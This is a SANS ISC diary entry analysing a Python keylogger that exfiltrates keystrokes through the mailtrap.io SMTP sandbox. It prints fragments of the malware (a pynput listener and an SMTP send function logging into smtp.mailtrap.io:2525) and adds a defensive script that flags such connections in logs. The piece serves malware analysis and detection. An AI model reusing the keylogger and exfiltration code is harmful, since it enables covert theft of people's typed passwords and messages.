Python Keylogger Using Mailtrap.io, (Sat, Dec 23rd)


I found another Python keylogger… This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:

from pynput import keyboard
from pynput.keyboard import Listener
...
keyboard_listener = keyboard.Listener(on_press=self.save_data)
with keyboard_listener:
    self.report()
    keyboard_listener.join()

This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker's C2. These days, Discord is very popular. I also found many abused Google Mail accounts.

But, in this case, the attacker used another popular online service: mailtrap.io[1]. This service is "an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production". You may register a free account and get a free environment that receives emails. Mailtrap provides an authenticated SMTP server for sending emails into that environment. Here is the code from the malicious script:

def send_mail(self, email, password, message):
    sender = "Private Person <from@example.com>"
    receiver = "A Test User <to@example.com>"
    m = f"""
    Subject: main Mailtrap
    To: {receiver}
    From: {sender}

    Keylogger by aydinnyunusn"""

    m += message
    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(email, password)
        server.sendmail(sender, receiver, message)

Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the script uses the last one, even though it is likely to be blocked in corporate environments. Otherwise, it's a nice way to fly below the radar…
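From a defender's side, the exfiltration channel described above (an authenticated SMTP session to smtp.mailtrap.io on one of the four ports) is easy to hunt for in connection logs: workstations normally have no business speaking SMTP to the Internet at all, and a mailtrap.io destination from an endpoint is a strong signal. The script below is an added example written for this diary, not code from the malicious script or from Mailtrap. It runs over constructed, space-separated connection records ("src_ip dst_ip dst_port dst_name") and flags outbound SMTP-port connections from any host that is not in an assumed list of approved mail relays, raising the severity when the destination is a mailtrap.io host. The record format, sample IPs and the relay list are all assumptions made for the example.

```python
"""Flag outbound SMTP connections that may be keylogger exfiltration.

Added example for this diary (not the malicious script's code). It parses
constructed connection records and flags SMTP-port traffic from hosts that
are not approved relays, with higher severity for mailtrap.io destinations.
"""
from __future__ import annotations

from dataclasses import dataclass

# Ports on which Mailtrap accepts mail, as stated in the diary.
SMTP_PORTS = {25, 465, 587, 2525}

# Hostname suffix of the service abused by the keylogger (from the diary).
SANDBOX_SUFFIXES = ("mailtrap.io",)

# Assumption: only the corporate relay is allowed to speak SMTP outbound.
APPROVED_RELAYS = {"10.0.0.25"}

# Constructed sample records: "<src_ip> <dst_ip> <dst_port> <dst_name>"
SAMPLE_CONN_LOG = """\
10.0.1.37 192.0.2.10 2525 smtp.mailtrap.io
10.0.0.25 198.51.100.5 25 mx.partner.example
10.0.1.37 203.0.113.80 443 www.example.com
10.0.1.52 192.0.2.11 587 smtp.mailtrap.io
10.0.1.52 198.51.100.9 465 smtp.some-provider.example
"""


@dataclass(frozen=True)
class Alert:
    src_ip: str
    dst_name: str
    dst_port: int
    severity: str


def parse_record(line: str) -> tuple[str, str, int, str] | None:
    """Parse one constructed record; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    src_ip, dst_ip, port, dst_name = parts
    try:
        return src_ip, dst_ip, int(port), dst_name.lower()
    except ValueError:
        return None


def is_sandbox_host(name: str) -> bool:
    """True when the destination is the sandbox domain or a subdomain of it."""
    return any(name == s or name.endswith("." + s) for s in SANDBOX_SUFFIXES)


def find_smtp_exfil(log_text: str, approved=APPROVED_RELAYS) -> list[Alert]:
    """Return one Alert per SMTP-port connection from a non-relay host."""
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        src_ip, _dst_ip, port, dst_name = rec
        # Skip non-SMTP traffic and the approved relay's legitimate mail flow.
        if port not in SMTP_PORTS or src_ip in approved:
            continue
        severity = "high" if is_sandbox_host(dst_name) else "medium"
        alerts.append(Alert(src_ip, dst_name, port, severity))
    return alerts


if __name__ == "__main__":
    for a in find_smtp_exfil(SAMPLE_CONN_LOG):
        print(f"{a.severity:6} {a.src_ip} -> {a.dst_name}:{a.dst_port}")
```

On the sample records, the relay's port-25 traffic and the HTTPS connection are ignored, the two mailtrap.io connections (on 2525 and 587) are reported as high, and the remaining endpoint-to-provider SMTP connection on 465 is reported as medium. In a real deployment the same logic would read Zeek conn.log or firewall exports and the relay list would come from the mail team's inventory.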

Conclusion: another free online service (ab)used by attackers!

Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d with a VT score of 8/61[2]

[1] https://mailtrap.io
[2] https://www.virustotal.com/gui/file/9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
